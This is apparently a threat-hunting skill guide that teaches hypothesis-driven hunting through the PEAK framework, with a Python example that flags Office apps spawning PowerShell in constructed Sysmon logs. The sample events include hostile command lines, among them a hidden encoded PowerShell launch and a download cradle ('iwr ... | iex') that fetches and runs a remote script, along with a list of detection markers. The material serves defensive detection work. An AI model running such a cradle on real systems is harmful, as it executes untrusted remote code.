threat-hunting


Threat Hunting — Proactive Adversary Detection

Hunt for adversaries who are already inside but haven't tripped an alert. Distinct from incident-triage (reactive, alert is firing) and from siem-detection (engineer rules so future alerts fire). This skill is the proactive layer — assume something has slipped through, look for it.

Hunting is hypothesis-driven, not browse-driven. "Let's look around the SIEM" is not hunting; "let's check for the specific pattern of T1059.001 (PowerShell) being launched by Office processes" is.

Cross-references: siem-detection (queries you write here often graduate to detection rules), incident-triage (what to do if a hunt confirms a finding), breach-patterns (a rich source of hunt hypotheses), disk-forensics (deeper analysis on confirmed hits).

Methodology — PEAK framework

The PEAK framework (Prepare, Execute, and Act with Knowledge) from Splunk SURGe is the most actionable hunting methodology I've seen.

Step 1: Prepare

Form the hypothesis. Strong hypotheses share three properties:

  1. Specific — names a technique, log source, and expected artifact
  2. Testable — describes what evidence would confirm or deny
  3. Bounded — has a defined time window and scope
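As an added example (not code from the cybersecurity-skills repository), the hypothesis from the introduction, Office processes spawning PowerShell (T1059.001), written down as data with all three properties and then tested against a handful of constructed Sysmon Event ID 1 records. The field names follow Sysmon's, but every host, user, timestamp and command line is invented; the secondary-indicator strings checked on hits are a hypothetical escalation aid, not part of PEAK.

```python
"""Hypothesis-driven hunt: Office process spawning PowerShell (T1059.001).

Added example, not code from the cybersecurity-skills repository. The
events below imitate Sysmon Event ID 1 (process creation) exported as JSON
lines; hosts, users, timestamps and command lines are constructed.
"""
import json
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class Hypothesis:
    """A hunt hypothesis that is specific, testable and bounded."""
    technique: str              # Specific: the ATT&CK technique being hunted
    log_source: str             # Specific: where the evidence would live
    parent_images: frozenset    # Specific: expected artifact, the parent process
    child_images: frozenset     # Specific: expected artifact, the spawned process
    start: datetime             # Bounded: time window (inclusive start)
    end: datetime               # Bounded: time window (exclusive end)
    scope: frozenset            # Bounded: hosts in scope; empty means whole fleet

    def evidence_matches(self, event: dict) -> bool:
        """Testable: True if this single event confirms the hypothesis."""
        ts = datetime.fromisoformat(event["UtcTime"])
        if not (self.start <= ts < self.end):
            return False
        if self.scope and event["Computer"] not in self.scope:
            return False
        parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
        child = event["Image"].rsplit("\\", 1)[-1].lower()
        return parent in self.parent_images and child in self.child_images


OFFICE_TO_POWERSHELL = Hypothesis(
    technique="T1059.001",
    log_source="Sysmon Event ID 1",
    parent_images=frozenset({"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}),
    child_images=frozenset({"powershell.exe", "pwsh.exe"}),
    start=datetime(2024, 3, 1, tzinfo=timezone.utc),
    end=datetime(2024, 3, 8, tzinfo=timezone.utc),
    scope=frozenset(),
)

# Constructed Sysmon-style events (JSON lines), not real telemetry.
# Line 2 has the wrong parent, line 3 is outside the window, line 4 spawns
# cmd.exe rather than PowerShell: none of those should be hits.
SAMPLE_EVENTS = r"""
{"UtcTime": "2024-03-04T09:12:01+00:00", "Computer": "WS-0417", "User": "CORP\\jdoe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"UtcTime": "2024-03-04T09:15:44+00:00", "Computer": "WS-0417", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-Process"}
{"UtcTime": "2024-02-20T14:00:00+00:00", "Computer": "WS-0099", "User": "CORP\\asmith", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File macro_helper.ps1"}
{"UtcTime": "2024-03-06T17:30:12+00:00", "Computer": "SRV-FIN01", "User": "CORP\\svc_reports", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"}
{"UtcTime": "2024-03-07T08:02:30+00:00", "Computer": "WS-0203", "User": "CORP\\mlee", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh.exe -c iwr http://198.51.100.7/a.ps1 | iex"}
"""

# Hypothetical secondary indicators used only to rank hits for follow-up.
ESCALATION_MARKERS = ("-enc", "iex", "iwr", "-w hidden")


def run_hunt(hypothesis: Hypothesis, json_lines: str) -> list:
    """Execute step: test the hypothesis against the log source, return hits."""
    hits = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if not hypothesis.evidence_matches(event):
            continue
        cmd = event["CommandLine"].lower()
        hits.append({
            "time": event["UtcTime"],
            "host": event["Computer"],
            "user": event["User"],
            "parent": event["ParentImage"].rsplit("\\", 1)[-1],
            "cmdline": event["CommandLine"],
            "markers": [m for m in ESCALATION_MARKERS if m in cmd],
        })
    return hits


if __name__ == "__main__":
    for hit in run_hunt(OFFICE_TO_POWERSHELL, SAMPLE_EVENTS):
        print(hit)
```

Two of the five events survive: the Word-to-powershell.exe launch with an encoded, hidden-window command line, and the Outlook-to-pwsh.exe download cradle. The explorer.exe parent, the February event outside the window, and the cmd.exe child all fall out because the hypothesis states its parent set, child set and time window up front. If a hit is confirmed it goes to incident-triage; if the check proves useful across several hunts, the same matching logic is what graduates into a siem-detection rule.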
First seen: May 27, 2026. Source: threat-hunting in briiirussell/cybersecurity-skills.